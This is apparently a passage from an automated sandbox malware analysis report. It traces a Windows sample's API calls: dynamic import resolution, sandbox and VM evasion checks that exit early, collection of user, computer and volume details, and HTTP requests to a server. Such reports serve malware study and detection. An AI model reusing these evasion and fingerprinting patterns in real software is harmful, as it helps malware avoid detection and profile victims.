                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID: "$"$------$------$------$p
                      • API String ID: 460715078-242323141
                      • Opcode ID: a5dd5d7ced7cb965675491fd3b4cd4d939e6c7f0f4db21a48456b986f110201a
                      • Instruction ID: 70ef84bcfb56b942fa9088642518229fbb5e121193e992a794fd2350857230f3
                      • Opcode Fuzzy Hash: a5dd5d7ced7cb965675491fd3b4cd4d939e6c7f0f4db21a48456b986f110201a
                      • Instruction Fuzzy Hash: 7B1244B19101189ADB14FBA1CC52FEE7338BF94304F50859EB11A62091DF782F59CF6A
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004611B7), ref: 00477880
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00477887
                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0047789F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser
                      • String ID:
                      • API String ID: 1296208442-0
                      • Opcode ID: 84fc16b387dfe1352d71d39aba83697e444e060a8b2069c25e66c614c90e574a
                      • Instruction ID: 42217b52d124cd9a45e9faa1694d1129dd8d8adb878acb9ee781397b6cba406e
                      • Opcode Fuzzy Hash: 84fc16b387dfe1352d71d39aba83697e444e060a8b2069c25e66c614c90e574a
                      • Instruction Fuzzy Hash: D4F04FB1D44209ABC700DFD8DD49FAEBBB8EB05B11F10025AFA05A2680C7786904CFA2
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitInfoProcessSystem
                      • String ID:
                      • API String ID: 752954902-0
                      • Opcode ID: 3659ec120d30370ba8d01148ff28a4c52cfb4806a5e6ef833e59fd7ae5d1fa16
                      • Instruction ID: 3818625a87b9958b647b61b143a8a63cb47e9294c5b403f546824199f9efa5f6
                      • Opcode Fuzzy Hash: 3659ec120d30370ba8d01148ff28a4c52cfb4806a5e6ef833e59fd7ae5d1fa16
                      • Instruction Fuzzy Hash: BFD05E7890030CDBCB00EFE0D9496EEBB79FB0E311F00155AD90562340EB30A881CAA6

                      Control-flow Graph
                      (graph rendering not reproduced in text; legend: Executed / Not Executed)
                      APIs
                      • GetProcAddress.KERNEL32(75900000,00E76460), ref: 00479C2D
                      • GetProcAddress.KERNEL32(75900000,00E764E0), ref: 00479C45
                      • GetProcAddress.KERNEL32(75900000,00E88EF8), ref: 00479C5E
                      • GetProcAddress.KERNEL32(75900000,00E88F10), ref: 00479C76
                      • GetProcAddress.KERNEL32(75900000,00E8CD18), ref: 00479C8E
                      • GetProcAddress.KERNEL32(75900000,00E8CDC0), ref: 00479CA7
                      • GetProcAddress.KERNEL32(75900000,00E7B400), ref: 00479CBF
                      • GetProcAddress.KERNEL32(75900000,00E8CBC8), ref: 00479CD7
                      • GetProcAddress.KERNEL32(75900000,00E8CB50), ref: 00479CF0
                      • GetProcAddress.KERNEL32(75900000,00E8CB68), ref: 00479D08
                      • GetProcAddress.KERNEL32(75900000,00E8CAF0), ref: 00479D20
                      • GetProcAddress.KERNEL32(75900000,00E76500), ref: 00479D39
                      • GetProcAddress.KERNEL32(75900000,00E765E0), ref: 00479D51
                      • GetProcAddress.KERNEL32(75900000,00E76640), ref: 00479D69
                      • GetProcAddress.KERNEL32(75900000,00E76560), ref: 00479D82
                      • GetProcAddress.KERNEL32(75900000,00E8CDD8), ref: 00479D9A
                      • GetProcAddress.KERNEL32(75900000,00E8CB08), ref: 00479DB2
                      • GetProcAddress.KERNEL32(75900000,00E7B4C8), ref: 00479DCB
                      • GetProcAddress.KERNEL32(75900000,00E76660), ref: 00479DE3
                      • GetProcAddress.KERNEL32(75900000,00E8CCB8), ref: 00479DFB
                      • GetProcAddress.KERNEL32(75900000,00E8CCD0), ref: 00479E14
                      • GetProcAddress.KERNEL32(75900000,00E8CBB0), ref: 00479E2C
                      • GetProcAddress.KERNEL32(75900000,00E8CB38), ref: 00479E44
                      • GetProcAddress.KERNEL32(75900000,00E76540), ref: 00479E5D
                      • GetProcAddress.KERNEL32(75900000,00E8CB80), ref: 00479E75
                      • GetProcAddress.KERNEL32(75900000,00E8CBE0), ref: 00479E8D
                      • GetProcAddress.KERNEL32(75900000,00E8CB20), ref: 00479EA6
                      • GetProcAddress.KERNEL32(75900000,00E8CB98), ref: 00479EBE
                      • GetProcAddress.KERNEL32(75900000,00E8CCE8), ref: 00479ED6
                      • GetProcAddress.KERNEL32(75900000,00E8CC40), ref: 00479EEF
                      • GetProcAddress.KERNEL32(75900000,00E8CDA8), ref: 00479F07
                      • GetProcAddress.KERNEL32(75900000,00E8CD00), ref: 00479F1F
                      • GetProcAddress.KERNEL32(75900000,00E8CD48), ref: 00479F38
                      • GetProcAddress.KERNEL32(75900000,00E8A068), ref: 00479F50
                      • GetProcAddress.KERNEL32(75900000,00E8CBF8), ref: 00479F68
                      • GetProcAddress.KERNEL32(75900000,00E8CCA0), ref: 00479F81
                      • GetProcAddress.KERNEL32(75900000,00E76280), ref: 00479F99
                      • GetProcAddress.KERNEL32(75900000,00E8CC88), ref: 00479FB1
                      • GetProcAddress.KERNEL32(75900000,00E762E0), ref: 00479FCA
                      • GetProcAddress.KERNEL32(75900000,00E8CD78), ref: 00479FE2
                      • GetProcAddress.KERNEL32(75900000,00E8CC70), ref: 00479FFA
                      • GetProcAddress.KERNEL32(75900000,00E76300), ref: 0047A013
                      • GetProcAddress.KERNEL32(75900000,00E76320), ref: 0047A02B
                      • LoadLibraryA.KERNEL32(00E8CD60,?,00475CA3,00480AEB,?,?,?,?,?,?,?,?,?,?,00480AEA,00480AE3), ref: 0047A03D
                      • LoadLibraryA.KERNEL32(00E8CC10,?,00475CA3,00480AEB,?,?,?,?,?,?,?,?,?,?,00480AEA,00480AE3), ref: 0047A04E
                      • LoadLibraryA.KERNEL32(00E8CD30,?,00475CA3,00480AEB,?,?,?,?,?,?,?,?,?,?,00480AEA,00480AE3), ref: 0047A060
                      • LoadLibraryA.KERNEL32(00E8CC58,?,00475CA3,00480AEB,?,?,?,?,?,?,?,?,?,?,00480AEA,00480AE3), ref: 0047A072
                      • LoadLibraryA.KERNEL32(00E8CD90,?,00475CA3,00480AEB,?,?,?,?,?,?,?,?,?,?,00480AEA,00480AE3), ref: 0047A083
                      • LoadLibraryA.KERNEL32(00E8CC28,?,00475CA3,00480AEB,?,?,?,?,?,?,?,?,?,?,00480AEA,00480AE3), ref: 0047A095
                      • LoadLibraryA.KERNEL32(00E8CE08,?,00475CA3,00480AEB,?,?,?,?,?,?,?,?,?,?,00480AEA,00480AE3), ref: 0047A0A7
                      • LoadLibraryA.KERNEL32(00E8CEC8,?,00475CA3,00480AEB,?,?,?,?,?,?,?,?,?,?,00480AEA,00480AE3), ref: 0047A0B8
                      • GetProcAddress.KERNEL32(75FD0000,00E767A0), ref: 0047A0DA
                      • GetProcAddress.KERNEL32(75FD0000,00E8CF40), ref: 0047A0F2
                      • GetProcAddress.KERNEL32(75FD0000,00E88B90), ref: 0047A10A
                      • GetProcAddress.KERNEL32(75FD0000,00E8CF88), ref: 0047A123
                      • GetProcAddress.KERNEL32(75FD0000,00E76900), ref: 0047A13B
                      • GetProcAddress.KERNEL32(73B10000,00E7B270), ref: 0047A160
                      • GetProcAddress.KERNEL32(73B10000,00E76880), ref: 0047A179
                      • GetProcAddress.KERNEL32(73B10000,00E7B2E8), ref: 0047A191
                      • GetProcAddress.KERNEL32(73B10000,00E8CEE0), ref: 0047A1A9
                      • GetProcAddress.KERNEL32(73B10000,00E8CE38), ref: 0047A1C2
                      • GetProcAddress.KERNEL32(73B10000,00E769A0), ref: 0047A1DA
                      • GetProcAddress.KERNEL32(73B10000,00E76780), ref: 0047A1F2
                      • GetProcAddress.KERNEL32(73B10000,00E8CE68), ref: 0047A20B
                      • GetProcAddress.KERNEL32(763B0000,00E769C0), ref: 0047A22C
                      • GetProcAddress.KERNEL32(763B0000,00E76760), ref: 0047A244
                      • GetProcAddress.KERNEL32(763B0000,00E8CF10), ref: 0047A25D
                      • GetProcAddress.KERNEL32(763B0000,00E8CEB0), ref: 0047A275
                      • GetProcAddress.KERNEL32(763B0000,00E769E0), ref: 0047A28D
                      • GetProcAddress.KERNEL32(750F0000,00E7B040), ref: 0047A2B3
                      • GetProcAddress.KERNEL32(750F0000,00E7B0E0), ref: 0047A2CB
                      • GetProcAddress.KERNEL32(750F0000,00E8CF28), ref: 0047A2E3
                      • GetProcAddress.KERNEL32(750F0000,00E768C0), ref: 0047A2FC
                      • GetProcAddress.KERNEL32(750F0000,00E766E0), ref: 0047A314
                      • GetProcAddress.KERNEL32(750F0000,00E7B018), ref: 0047A32C
                      • GetProcAddress.KERNEL32(75A50000,00E8CE80), ref: 0047A352
                      • GetProcAddress.KERNEL32(75A50000,00E76940), ref: 0047A36A
                      • GetProcAddress.KERNEL32(75A50000,00E88A90), ref: 0047A382
                      • GetProcAddress.KERNEL32(75A50000,00E8CF58), ref: 0047A39B
                      • GetProcAddress.KERNEL32(75A50000,00E8CE50), ref: 0047A3B3
                      • GetProcAddress.KERNEL32(75A50000,00E76680), ref: 0047A3CB
                      • GetProcAddress.KERNEL32(75A50000,00E76A00), ref: 0047A3E4
                      • GetProcAddress.KERNEL32(75A50000,00E8CE98), ref: 0047A3FC
                      • GetProcAddress.KERNEL32(75A50000,00E8CEF8), ref: 0047A414
                      • GetProcAddress.KERNEL32(75070000,00E76960), ref: 0047A436
                      • GetProcAddress.KERNEL32(75070000,00E8CF70), ref: 0047A44E
                      • GetProcAddress.KERNEL32(75070000,00E8CFA0), ref: 0047A466
                      • GetProcAddress.KERNEL32(75070000,00E8CDF0), ref: 0047A47F
                      • GetProcAddress.KERNEL32(75070000,00E8CE20), ref: 0047A497
                      • GetProcAddress.KERNEL32(74E50000,00E76740), ref: 0047A4B8
                      • GetProcAddress.KERNEL32(74E50000,00E768A0), ref: 0047A4D1
                      • GetProcAddress.KERNEL32(75320000,00E767C0), ref: 0047A4F2
                      • GetProcAddress.KERNEL32(75320000,00E8C820), ref: 0047A50A
                      • GetProcAddress.KERNEL32(6F060000,00E76700), ref: 0047A530
                      • GetProcAddress.KERNEL32(6F060000,00E76A20), ref: 0047A548
                      • GetProcAddress.KERNEL32(6F060000,00E76980), ref: 0047A560
                      • GetProcAddress.KERNEL32(6F060000,00E8C850), ref: 0047A579
                      • GetProcAddress.KERNEL32(6F060000,00E766A0), ref: 0047A591
                      • GetProcAddress.KERNEL32(6F060000,00E767E0), ref: 0047A5A9
                      • GetProcAddress.KERNEL32(6F060000,00E766C0), ref: 0047A5C2
                      • GetProcAddress.KERNEL32(6F060000,00E76720), ref: 0047A5DA
                      • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0047A5F1
                      • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0047A607
                      • GetProcAddress.KERNEL32(74E00000,00E8C8B0), ref: 0047A629
                      • GetProcAddress.KERNEL32(74E00000,00E88A10), ref: 0047A641
                      • GetProcAddress.KERNEL32(74E00000,00E8CA90), ref: 0047A659
                      • GetProcAddress.KERNEL32(74E00000,00E8C8C8), ref: 0047A672
                      • GetProcAddress.KERNEL32(74DF0000,00E76820), ref: 0047A693
                      • GetProcAddress.KERNEL32(6F9C0000,00E8C868), ref: 0047A6B4
                      • GetProcAddress.KERNEL32(6F9C0000,00E76840), ref: 0047A6CD
                      • GetProcAddress.KERNEL32(6F9C0000,00E8C838), ref: 0047A6E5
                      • GetProcAddress.KERNEL32(6F9C0000,00E8C8E0), ref: 0047A6FD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: c$ g$ h$ j$@e$@f$@g$@h$@i$HttpQueryInfoA$InternetSetOptionA$`d$`e$`f$`g$`i$b$d$e$f$g$i
                      • API String ID: 2238633743-111007783
                      • Opcode ID: 1d8e7f927a971004b65aa4ffd6abbadaf24c443f3ec6f906dc9963b27d79c80d
                      • Instruction ID: 45e02bc2888c08cbf67cfe8773e9826e2b4bd8815e7b981c3bd27eb6bba74de6
                      • Opcode Fuzzy Hash: 1d8e7f927a971004b65aa4ffd6abbadaf24c443f3ec6f906dc9963b27d79c80d
                      • Instruction Fuzzy Hash: 68621BB9500210AFC395FFE8ED889A637FBE74F601714A51BA609C3264D739B841DF62

                      Control-flow Graph
                      (graph rendering not reproduced in text; legend: Executed / Not Executed)
                      APIs
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 004647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00464839
                        • Part of subcall function 004647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00464849
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • InternetOpenA.WININET(00480DFE,00000001,00000000,00000000,00000000), ref: 004662E1
                      • StrCmpCA.SHLWAPI(?,00E8E2F0), ref: 00466303
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00466335
                      • HttpOpenRequestA.WININET(00000000,GET,?,00E8DCF8,00000000,00000000,00400100,00000000), ref: 00466385
                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004663BF
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004663D1
                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004663FD
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0046646D
                      • InternetCloseHandle.WININET(00000000), ref: 004664EF
                      • InternetCloseHandle.WININET(00000000), ref: 004664F9
                      • InternetCloseHandle.WININET(00000000), ref: 00466503
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                      • String ID: ERROR$ERROR$GET
                      • API String ID: 3749127164-2509457195
                      • Opcode ID: 8c5386edb69db4c66588fb5700d587d74f8b4cc0cd02b4ac3223e129c410eb29
                      • Instruction ID: 6a19d69f3f9b240738d167258d0131123c769269154153beed399b7d773724a0
                      • Opcode Fuzzy Hash: 8c5386edb69db4c66588fb5700d587d74f8b4cc0cd02b4ac3223e129c410eb29
                      • Instruction Fuzzy Hash: 09718271A00218ABDB24EFE0CC45FEE7779FB44700F10855AF5096B290DBB86A85CF56

                      Control-flow Graph
                      • Function 00475510-00475AC6 (graph rendered in the interactive report; node and edge list omitted)
                      APIs
                        • Part of subcall function 0047A820: lstrlen.KERNEL32(00464F05,?,?,00464F05,00480DDE), ref: 0047A82B
                        • Part of subcall function 0047A820: lstrcpy.KERNEL32(00480DDE,00000000), ref: 0047A885
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00475644
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004756A1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00475857
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 004751F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00475228
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 004752C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00475318
                        • Part of subcall function 004752C0: lstrlen.KERNEL32(00000000), ref: 0047532F
                        • Part of subcall function 004752C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00475364
                        • Part of subcall function 004752C0: lstrlen.KERNEL32(00000000), ref: 00475383
                        • Part of subcall function 004752C0: lstrlen.KERNEL32(00000000), ref: 004753AE
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0047578B
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00475940
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00475A0C
                      • Sleep.KERNEL32(0000EA60), ref: 00475A1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated dumps: same set as listed under the first function record above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen$Sleep
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 507064821-2791005934
                      • Opcode ID: 41fbebf32a66c0a9c87b5830b28b784503e96326f685ee16c7502fd46e382f22
                      • Instruction ID: df27b6b57fa83187ed1782ed23722fd9418fbdae2bb30e01b3208b95d3dbf2ac
                      • Opcode Fuzzy Hash: 41fbebf32a66c0a9c87b5830b28b784503e96326f685ee16c7502fd46e382f22
                      • Instruction Fuzzy Hash: 06E17371910104AACB18FBB1DC52AEE7339AF94304F50C52FB41A56091EF7C6A19CBAB

                      Control-flow Graph
                      • Function 004717A0-004719CD (graph rendered in the interactive report; node and edge list omitted)
                      APIs
                      • StrCmpCA.SHLWAPI(00000000,block), ref: 004717C5
                      • ExitProcess.KERNEL32 ref: 004717D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated dumps: same set as listed under the first function record above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID: block
                      • API String ID: 621844428-2199623458
                      • Opcode ID: 2d163773a6abff3a1164b516fd49f2091008e4eb348989dcb88f3666ab657c72
                      • Instruction ID: 4eec4a132e362482ae6383585eb71cfdeea199571e131e86418d275837b9b9d0
                      • Opcode Fuzzy Hash: 2d163773a6abff3a1164b516fd49f2091008e4eb348989dcb88f3666ab657c72
                      • Instruction Fuzzy Hash: D4516CF4A04209EBCB04EFA4C954BFE77B5AF44704F10C44AE50967360D778E956CB6A

                      Control-flow Graph
                      • Function 00477500-0047768E (graph rendered in the interactive report; node and edge list omitted)
                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00477542
                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047757F
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00477603
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0047760A
                      • wsprintfA.USER32 ref: 00477640
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated dumps: same set as listed under the first function record above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\$H
                      • API String ID: 1544550907-3928310333
                      • Opcode ID: 37e54d487f94721b56d2a15f0e8534554f4dcbab8e1287ed4fb29a7dc045736c
                      • Instruction ID: 369938c48f56f7a9f5c5bcdcb0437ad57daf7d274f89edbf432e8e5f8f789822
                      • Opcode Fuzzy Hash: 37e54d487f94721b56d2a15f0e8534554f4dcbab8e1287ed4fb29a7dc045736c
                      • Instruction Fuzzy Hash: B64173B1D04258ABDB10DF94DC45BEEBBB8EF48714F10419EF50967280D778AA44CFA9

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E807C8), ref: 004798A1
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E807F8), ref: 004798BA
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E80810), ref: 004798D2
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E805A0), ref: 004798EA
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E80840), ref: 00479903
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E88BA0), ref: 0047991B
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E765C0), ref: 00479933
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E762A0), ref: 0047994C
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E806F0), ref: 00479964
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E80648), ref: 0047997C
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E80708), ref: 00479995
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E80558), ref: 004799AD
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E76480), ref: 004799C5
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E80570), ref: 004799DE
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 004611D0: ExitProcess.KERNEL32 ref: 00461211
                        • Part of subcall function 00461160: GetSystemInfo.KERNEL32(?), ref: 0046116A
                        • Part of subcall function 00461160: ExitProcess.KERNEL32 ref: 0046117E
                        • Part of subcall function 00461110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0046112B
                        • Part of subcall function 00461110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00461132
                        • Part of subcall function 00461110: ExitProcess.KERNEL32 ref: 00461143
                        • Part of subcall function 00461220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0046123E
                        • Part of subcall function 00461220: __aulldiv.LIBCMT ref: 00461258
                        • Part of subcall function 00461220: __aulldiv.LIBCMT ref: 00461266
                        • Part of subcall function 00461220: ExitProcess.KERNEL32 ref: 00461294
                        • Part of subcall function 00476770: GetUserDefaultLangID.KERNEL32 ref: 00476774
                        • Part of subcall function 00461190: ExitProcess.KERNEL32 ref: 004611C6
                        • Part of subcall function 00477850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004611B7), ref: 00477880
                        • Part of subcall function 00477850: RtlAllocateHeap.NTDLL(00000000), ref: 00477887
                        • Part of subcall function 00477850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0047789F
                        • Part of subcall function 004778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00477910
                        • Part of subcall function 004778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00477917
                        • Part of subcall function 004778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0047792F
